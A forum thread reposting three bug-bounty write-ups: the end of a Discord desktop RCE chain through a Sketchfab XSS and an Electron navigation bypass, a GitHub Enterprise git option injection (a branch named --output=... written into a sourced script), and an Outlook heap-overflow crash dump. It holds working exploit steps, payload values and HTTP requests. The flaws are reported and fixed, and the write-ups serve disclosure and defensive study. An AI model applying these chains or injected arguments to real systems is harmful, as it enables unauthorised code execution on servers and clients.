https://checkout.paypal.com https://*.watchanimeattheoffice.com Obviously, some of them are listed to allow iframe embeds (e.g. YouTube, Twitch, Spotify). I tried to check if the URL can be embeded in the iframe by specifying the domain into the OGP information one by one and tried to find XSS on the embedded domains. After some attempts, I found that the sketchfab.com, which is one of the domains listed in the CSP, can be embedded in the iframe and found XSS on the embeds page. I didn't know about Sketchfab at that time, but it seems that it is a platform in which users can publish, buy and sell 3D models. There was a simple DOM-based XSS in the footnote of the 3D model. The following is the PoC, which has the crafted OGP. When I posted this URL to the chat, the Sketchfab was embedded into the iframe on the chat, and after a few clicks on the iframe, arbitrary JavaScript was executed. https://l0.cm/discord_rce_og.html <head> <meta charset="utf-8"> <meta property="og:title" content="RCE DEMO"> [...] <meta property="og:video:url" content="https://sketchfab.com/models/2b198209466d43328169d2d14a4392bb/embed"> <meta property="og:video:type" content="text/html"> <meta property="og:video:width" content="1280"> <meta property="og:video:height" content="720"> </head> Okay, finally I found an XSS, but the JavaScript is still executed on the iframe. Since Electron doesn't load the "JavaScript code outside web pages" into the iframe, so even if I override the JavaScript built-in methods on the iframe, I can't interfere with the Node.js' critical parts. To achieve RCE, we need to get out of the iframe and execute JavaScript in a top-level browsing context. This requires opening a new window from the iframe or navigating the top window to another URL from the iframe. I checked the related code and I found the code to restrict navigations by using "new-window" and "will-navigate" event in the code of the main process: mainWindow.webContents.on('new-window', (e, windowURL, frameName, disposition, options) => { e.preventDefault(); if (frameName.startsWith(DISCORD_NAMESPACE) && windowURL.startsWith(WEBAPP_ENDPOINT)) { popoutWindows.openOrFocusWindow(e, windowURL, frameName, options); } else { _electron.shell.openExternal(windowURL); } }); [...] mainWindow.webContents.on('will-navigate', (evt, url) => { if (!insideAuthFlow && !url.startsWith(WEBAPP_ENDPOINT)) { evt.preventDefault(); } }); I thought this code can correctly prevent users from opening the new window or navigating the top window. However, I noticed the unexpected behavior. Navigation restriction bypass (CVE-2020-15174) I thought the code is okay but I tried to check that the top navigation from the iframe is blocked anyway. Then, surprisingly, the navigation was not blocked for some reason. I expected that the attempt is catched by the "will-navigate" event before the navigation happens and refused by the preventDefault(), but is not. To test this behavior, I created a small Electron app. And I found that the "will-navigate" event is not emitted from the top navigation started from an iframe for some reason. To be exact, if the top's origin and iframe's origin is in the same-origin, the event is emitted but if it is in the different origin, the event is not emitted. I didn't think that there is a a legitimate reason for this behavior, so I thought this is an Electron's bug and decided to report to Electron team later. With the help of this bug, I was able to bypass the navigation restriction. The last thing I should do is just a navigation to the page which contains the RCE code by using the iframe's XSS, like top.location="//l0.cm/discord_calc.html". In this way, by combining with three bugs, I was able to achieve RCE as shown in the video below. In the end These issues were reported through Discord's Bug Bounty Program. First, Discord team disabled the Sketchfab embeds, and a workaround was taken to prevent navigation from the iframe by adding the sandbox attribute to the iframe. After a while, the contextIsolation was enabled. Now even if I could execute arbitrary JavaScript on the app, RCE does not occur via the overridden JavaScript built-in methods. I received $5,000 as a reward for this discovery. The XSS on Sketchfab was reported through Sketchfab's Bug Bounty Program and fixed by Sketchfab developers quickly. I received $300 as a reward for this discovery. The bug in the "will-navigate" event was reported as a bug of Electron to Electron's security team, and it was fixed as the following vulnerability (CVE-2020-15174). Unpreventable top-level navigation · Advisory · electron/electron https://github.com/electron/electron/security/advisories/GHSA-2q4g-w47c-4674 That's it. Personally, I like that the external page's bug or Electron's bug, which is unrelated to the app itself's implementation, led to RCE I hope this article helps you keep your Electron apps secure. Thanks for reading! Posted by Masato Kinugawa Sursa: https://mksben.l0.cm/2020/10/discord-desktop-rce.html
      • 1
      • Upvote
  22. GitHub - RCE via git option injection (almost) - $20,000 Bounty Oct 18, 2020 It had been a while since I’d looked into GitHub, so I thought it would be good to spin up a fresh enterprise trial and see what I could find. The GHE code is obfuscated, but it’s just to discourage customers from messing around and if you do a bit of googling there are lots of scripts available to decode it leaving you with regular ruby files for a rails app. The last bug I submitted to GitHub was around a year ago. It was to do with injecting options into the git command using branch names that started with a - allowing an attacker to truncate files on the server, so I decided that was a good place to start to see if any similar bugs had been introduced. Discovery I began searching for all the places that the git process was called, then tracing the arguments back to see if they were user controllable and if they were sanitised correctly. Most places either put user controlled data behind -- in the command so that it is never parsed as an option, or there was a check to make sure that it is a valid sha1 or commitish value and doesn’t start with a -. After a while I came across a method reverse_diff which took two commits and ended up running a git diff-tree with them, and the only check was that there were both valid git references for the repo (sha, branch, tag, etc). Tracing backwards, this function was called by a revert_range method which was used when reverting between two previous wiki commits. So a POST to user/repo/wiki/Home/_revert/57f931f8839c99500c17a148c6aae0ee69ded004/1967827bcd890246b746a5387340356d0ac7710a would end up calling reverse_diff with the values 57f931f8839c99500c17a148c6aae0ee69ded004 and 1967827bcd890246b746a5387340356d0ac7710a. This looked perfect! I checked out a repo and pushed a new branch called --help with git push origin master:--help, then tried to post to user/repo/wiki/Home/_revert/HEAD/--help. But instead of success a 422 Unprocessable Entity was returned. Looking at the server logs it was complaining that the CSRF token was invalid. Turns out that rails now has per form CSRF tokens that are generated based on the path that you are posting to. Query parameters aren’t checked, but in this case the route was setup to only allow path params for the commits. The form for the revert along with the valid token was generated by the wiki compare template, but unfortunately that had a much stricter validation and required the commits to be valid sha hashes. This meant that I couldn’t get it to render a valid form and token for the --help branch, only for valid commit shas. Digging into the valid_authenticity_token? method in rails, another way to bypass the per form CSRF is by using the global token, as there is a code path to make existing forms backwards compatible while transitioning. def valid_authenticity_token?(session, encoded_masked_token) # :doc: if encoded_masked_token.nil? || encoded_masked_token.empty? || !encoded_masked_token.is_a?(String) return false end begin masked_token = Base64.strict_decode64(encoded_masked_token) rescue ArgumentError # encoded_masked_token is invalid Base64 return false end # See if it's actually a masked token or not. In order to # deploy this code, we should be able to handle any unmasked # tokens that we've issued without error. if masked_token.length == AUTHENTICITY_TOKEN_LENGTH # This is actually an unmasked token. This is expected if # you have just upgraded to masked tokens, but should stop # happening shortly after installing this gem. compare_with_real_token masked_token, session elsif masked_token.length == AUTHENTICITY_TOKEN_LENGTH * 2 csrf_token = unmask_token(masked_token) compare_with_real_token(csrf_token, session) || valid_per_form_csrf_token?(csrf_token, session) else false # Token is malformed. end end The global CSRF token is quite often handed out to the client using the csrf_meta_tags helper, but GitHub had really locked down everything and after a lot of searching the was no place that I could find that was leaking it. GitHub had even gone so far as raising an error if the per form CSRF was not setup correctly, as that could leak the global token. I spent quite a bit of time searching for a way to bypass this, the way the token was generated by rails it didn’t really matter where the form was created so long as I could get it to use a path such as wiki/Home/_revert/HEAD/--help. After a lot of searching and digging very deep within both GHE and rails code I came up empty handed. I did find a few archived html pages on github.com indicating that the global token used to be handed out just not any more. GitHub stores the global CSRF token for a user session in the database, so I decided to just grab it from there continue on and could come back to how to find it later. Exploit I installed and ran execsnoop from perf-tools on the GHE server to have a closer look at the exact git command that was run when doing a revert and saw that it was in the form git diff-tree -p -R commit1 commit2 -- Home.md. The diff-tree git command has an option --output allowing you to write the output to a file instead of outputting the results, so using HEAD as the first commit and --output=/tmp/ggg as the second would write the lastest diff of a file to /tmp/ggg. So I pushed a new branch called --output=/tmp/ggg to the wiki repo, then did a POST to user/repo/wiki/Home/_revert/HEAD/--output%3D%2Ftmp%2Fggg using the authenticity_token I’d grabbed from the database. Looking on the server the file /tmp/ggg had been created with the output of the diff! 9ea5ef1f10e9ff1974055d3e4a60bec143822f9d diff --git b/Home.md a/Home.md index c3a38e1..85402bc 100644 --- b/Home.md +++ a/Home.md @@ -1,4 +1,3 @@ Welcome to the public wiki! -3 +2 The next thing to do was to work out what to do with it. The file could be written anywhere the git user had access to, and the content at the end of the file was fairly controllable. After a lot more searching I found a few writeable env.d directories (such as /data/github/shared/env.d) which contained some setup scripts. The files in these directories ended up being sourced when the services started up or when commands some were run: for i in $envdir/*.sh; do if [ -r $i ]; then . $i fi done Since doing a . script.sh doesn’t require the file to executable, and bash will continue running a script after it encounters errors, this meant that if the diff that was written contained some valid shell script then it would be executed! So now I had everything (kind of) that was required to exploit the bug. Grab a users CSRF token from the database Create a wiki page containing ; echo vakzz was here > /tmp/ggg Edit the wiki page and add a new line of text: # anything Clone the wiki repo Push a new branch name with our injected flag: git push origin master:--output=/data/failbotd/shared/env.d/00-run.sh Use burp or curl to post to user/repo/wiki/Home/_revert/HEAD/--output%3D%2Fdata%2Ffailbotd%2Fshared%2Fenv%2Ed%2F00-run%2Esh using the authenticity_token from the database POST /user/repo/wiki/Home/_revert/HEAD/--output%3D%2Fdata%2Ffailbotd%2Fshared%2Fenv%2Ed%2F00-run%2Esh HTTP/1.1 Content-Type: application/x-www-form-urlencoded Cookie: user_session=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX Content-Length: 65 authenticity_token=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%3d Check the server to see that file has been created with our diff: $ cat /data/failbotd/shared/env.d/00-run.sh 69eb12b5e9969ec73a9e01a67555c089bcf0fc36 diff --git b/Home.md a/Home.md index 4a7b77c..ce38b05 100644 --- b/Home.md +++ a/Home.md @@ -1,2 +1 @@ -; echo vakzz was here > /tmp/ggg` -# anything \ No newline at end of file +; echo vakzz was here > /tmp/ggg` \ No newline at end of file Run the file that sources our diff and check it worked ./production.sh ./production.sh: 1: /data/failbotd/current/.app-config/env.d/00-run.sh: 69eb12b5e9969ec73a9e01a67555c089bcf0fc36: not found diff: unrecognized option '--git' diff: Try 'diff --help' for more information. ./production.sh: 3: /data/failbotd/current/.app-config/env.d/00-run.sh: index: not found ./production.sh: 4: /data/failbotd/current/.app-config/env.d/00-run.sh: ---: not found ./production.sh: 5: /data/failbotd/current/.app-config/env.d/00-run.sh: +++: not found ./production.sh: 6: /data/failbotd/current/.app-config/env.d/00-run.sh: @@: not found ./production.sh: 7: /data/failbotd/current/.app-config/env.d/00-run.sh: -: not found ./production.sh: 2: /data/failbotd/current/.app-config/env.d/00-run.sh: -#: not found ./production.sh: 3: /data/failbotd/current/.app-config/env.d/00-run.sh: No: not found ./production.sh: 4: /data/failbotd/current/.app-config/env.d/00-run.sh: +: not found ./production.sh: 11: /data/failbotd/current/.app-config/env.d/00-run.sh: No: not found $ cat /tmp/ggg vakzz was here At this stage I decided to report the issue to GitHub, even though I had no way to bypass the per form CSRF token. The underlying issue was still pretty critical, and it’s possible that GitHub could released a patch in the future that accidentally leaked the global token or change the route to accept query parameters which would open them up to being vulnerable. Within 15 minutes GitHub had triaged the bug and let me know that they were looking into it. A few hours later they responded again confirming the underlying issue and that they could not find a way to bypass the per form token, mentioning that it was a severe issue that they may had just been lucky with their CSRF setup. I sent through a summary of the methods I’d tried for bypassing the per form as well as potential spots that it might be possible to leak it, and confirmed that I thought it was pretty unlikely to be exploitable. So the bug itself was critical, but without it being exploitable I really had no idea how GitHub was going to land when deciding a bounty, or even if there would be a bounty at all. I ended up being very pleasantly surprised. Timeline July 25, 2020 01:48:02 AEST - Bug submitted via HackerOne July 25, 2020 02:05:21 AEST - Bug was triaged by GitHub July 25, 2020 09:18:28 AEST - Underlying issue was confirmed August 11, 2020 - GitHub Enterprise 2.21.4 released fixing the issue High: An attacker could inject a malicious argument into a Git sub-command when executed on GitHub Enterprise Server. This could allow an attacker to overwrite arbitrary files with partially user-controlled content and potentially execute arbitrary commands on the GitHub Enterprise Server instance. To exploit this vulnerability, an attacker would need permission to access repositories within the GHES instance. However, due to other protections in place, we could not identify a way to actively exploit this vulnerability. This vulnerability was reported through the GitHub Security Bug Bounty program. September 11, 2020 02:52:15 AEST - $20,000 bounty awarded Sursa: https://devcraft.io/2020/10/18/github-rce-git-inject.html
  23. CVE-2020-16947 This vulnerability occurs in Outlook 2019 (16.0.13231.20262) installed on Windows 10 1909 x64 TLDR; I found this bug usng winafl fuzzer. This bug occured when parsing html contents. if attacker successfully executes this exploit, it can lead to remote command execution. Details 0:000> r rax=0000000000000000 rbx=0000021c99ce9eb0 rcx=0000021c99ce9eb0 rdx=00000046c07f8a30 rsi=0000021cc85ac000 rdi=00000000ffffe000 rip=00007ffe69012f5b rsp=00000046c07f89f0 rbp=00000046c07f8a69 r8=00000046c07f8a28 r9=0000000000000041 r10=00007de1cf5e3124 r11=0000000000000000 r12=00000046c07f8b00 r13=0000021c99ce9f1c r14=0000000000000041 r15=00000000000003b5 iopl=0 nv up ei pl zr na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 OLMAPI32!HrGetMessageClassFromContentClassW+0xf80b: 00007ffe`69012f5b 448836 mov byte ptr [rsi],r14b ds:0000021c`c85ac000=?? 0:000> d rsi - 10 0000021c`c85abff0 ff fd ff fd ff fd ff fd-ff fd ff fd ff fd ff 41 ...............A 0000021c`c85ac000 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 0000021c`c85ac010 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 0000021c`c85ac020 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 0000021c`c85ac030 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 0000021c`c85ac040 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 0000021c`c85ac050 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 0000021c`c85ac060 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 0:000> !heap -p -a rsi address 0000021cc85ac000 found in _DPH_HEAP_ROOT @ 21ce0331000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) 21ccb3eb000: 21cc85a7ff0 4010 - 21cc85a7000 6000 00007ffea238825b ntdll!RtlDebugAllocateHeap+0x000000000000003b 00007ffea22a9745 ntdll!RtlpAllocateHeap+0x00000000000000f5 00007ffea22a73d4 ntdll!RtlpAllocateHeapInternal+0x00000000000006d4 00007ffe68c8777d OLMAPI32!MAPIAllocateBuffer+0x00000000000000cd 00007ffe69012a35 OLMAPI32!HrGetMessageClassFromContentClassW+0x000000000000f2e5 00007ffe69015d34 OLMAPI32!HrTextFromCompressedRTFStreamEx+0x00000000000023d4 00007ffe68dcc776 OLMAPI32!RTFSyncCpid+0x0000000000000156 00007ffe7c3eb532 exsec32!HrExsec32Initialize+0x0000000000005372 00007ffe7c3e5631 exsec32+0x0000000000005631 00007ffe68dccc76 OLMAPI32!RTFSyncCpid+0x0000000000000656 00007ffe68de2ab4 OLMAPI32!HrCreateMHTMLConverter+0x0000000000002634 00007ffe68dd21a7 OLMAPI32!MlangIsConvertible+0x0000000000004a07 00007ffe68de299d OLMAPI32!HrCreateMHTMLConverter+0x000000000000251d 00007ffe7c42748f exsec32!DllUnregisterServer+0x00000000000002bf 00007ffe7c3eb418 exsec32!HrExsec32Initialize+0x0000000000005258 00007ffe7c3e5631 exsec32+0x0000000000005631 00007ffe551703d9 OUTLMIME!MimeOleInetDateToFileTime+0x0000000000025539 00007ffe551709f9 OUTLMIME!MimeOleInetDateToFileTime+0x0000000000025b59 00007ffe55174dec OUTLMIME!MimeOleInetDateToFileTime+0x0000000000029f4c 00007ffe55175279 OUTLMIME!MimeOleInetDateToFileTime+0x000000000002a3d9 00007ffe55174ebe OUTLMIME!MimeOleInetDateToFileTime+0x000000000002a01e 00007ffe7c41a8fc exsec32!HrMaxAlgStrength+0x0000000000004cac 00007ffe7c3eb017 exsec32!HrExsec32Initialize+0x0000000000004e57 00007ffe7c3ebf23 exsec32!HrExsec32Initialize+0x0000000000005d63 00007ffe49ac9f47 mso98win32client!Ordinal3621+0x00000000000000e7 00007ffe49ac9ecd mso98win32client!Ordinal3621+0x000000000000006d 00007ff7afc43f79 outlook!FEnableAMapProgress+0x000000000002f099 00007ff7afdb638d outlook!UpdateSharingAccounts+0x000000000007031d 00007ff7afdc3d85 outlook!IsOutlookOutsideWinMain+0x0000000000003af5 00007ff7afcf7727 outlook!HrGetDelegatorInfoSync+0x00000000000016e7 00007ff7afd2a2b0 outlook!GetOutlookSafeModeState+0x000000000000bd00 00007ff7afd2a14b outlook!GetOutlookSafeModeState+0x000000000000bb9b When copying strings out of the ascii range among html contents, the corresponding string is replaced with 0xfffd. As a result, the size of the copied string doubles, so despite the same size of the src buffer and dst buffer, buffer overflow occurs. Sursa: https://github.com/0neb1n/CVE-2020-16947
×
×
  • Create New...